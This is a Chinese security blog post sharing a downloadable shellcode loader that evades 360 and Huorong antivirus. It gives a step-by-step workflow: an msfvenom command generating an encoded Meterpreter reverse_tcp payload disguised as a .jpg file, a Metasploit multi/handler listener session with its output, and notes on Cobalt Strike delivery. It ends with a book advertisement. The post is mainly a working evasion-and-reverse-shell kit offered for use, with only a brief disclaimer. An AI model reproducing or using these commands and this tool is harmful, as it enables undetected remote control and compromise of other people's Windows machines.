【工具分享】免杀360&火绒的shellcode加载器

小数志

共 2719字,需浏览 6分钟

 ·

2022-01-24 08:13


✎ 阅读须知


乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!


【工具分享】免杀360&火绒的shellcode加载器

1. 免杀效果

shellcode加载器目前可以过360&火绒Windows Defender没戏。。。

代码和思路暂不开源!

你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载!

方法:生成msfcsshellcode原生格式,命名为crowsec.jpg这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可!

1.1 当前

1.2 半年前

这个数据已没有意义。


这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68

2021-06-21是能过火绒360Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!!

鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。


查询时间:2022.01.19


3. 使用方法

3.1. msf上线

在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章: 

老树开新花之shellcode_launcher免杀Windows Defender


 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

使用msf进行监听:


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

3.1.1 360

i

3.1.2 Windows Defender

被杀


3.1.3 火绒


3.2 Cobalt Strike上线

在这里只说思路,能够过火绒360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。



将文件保存为crowsec.jpg下图是一个示例,主要是太累了,不想换了。。。

image.png

现将生成的bin文件修改为png文件,然后双击上线操作


但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360火绒是不影响的。

往期推荐



老树开新花之shellcode_launcher免杀Windows Defender

自写go加载器加壳免杀——过国内主流杀软

PowerShell随机免杀结合ps2exe上线

pyinstaller打包exe免杀和逆向浅析

upx加壳过360

go加壳分离免杀过国内主流杀软

[文末抽奖] 免杀:GO实现shellcode加载器过360

pyinstaller打包逆向分析,顺便免杀Windows Defender


tips:加我wx,拉你入群,一起学习






新书推荐

    过去网络安全距离我们很远,只要没有被攻击便可以忽略,而现在如果存在安全漏洞且一不小心被成功攻击,就可能导致很多公司财务等重要数据被勒索病毒感染,造成巨大经济损失!近几年来,国家展开了护网行动,加上各种机构经常组织CTF比赛等,网络安全越来越火,人才缺口也越来越大。“会渗透,是懂安全的基础;会漏扫,是懂渗透的基础;去实战,是检验能力的标准”此书可以给网络安全领域的专业人士或想入门的人士答疑解惑,是您必不可少的一本专业图书!

本书从网络攻防实战的角度,对Web漏洞扫描利用及防御进行全面系统的研究,由浅入深地介绍了在渗透过程中如何对Web漏洞进行扫描、利用分析及防御,以及在漏洞扫描及利用过程中需要了解和掌握的基础技术。

全书共分10章,包括漏洞扫描必备基础知识、域名信息收集、端口扫描、指纹信息收集与目录扫描、Web漏洞扫描、Web常见漏洞分析与利用、密码扫描及暴力破解、手工代码审计利用与漏洞挖掘、自动化的漏洞挖掘和利用、Web漏洞扫描安全防御,基本涵盖了Web漏洞攻防技术体系的全部内容。书中还以一些典型漏洞进行扫描利用及实战,通过漏洞扫描利用来还原攻击过程,从而可以针对性地进行防御。





点击上方链接,更多优惠等你哦~


扫取二维码获取

更多精彩

乌鸦安全

浏览 13
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报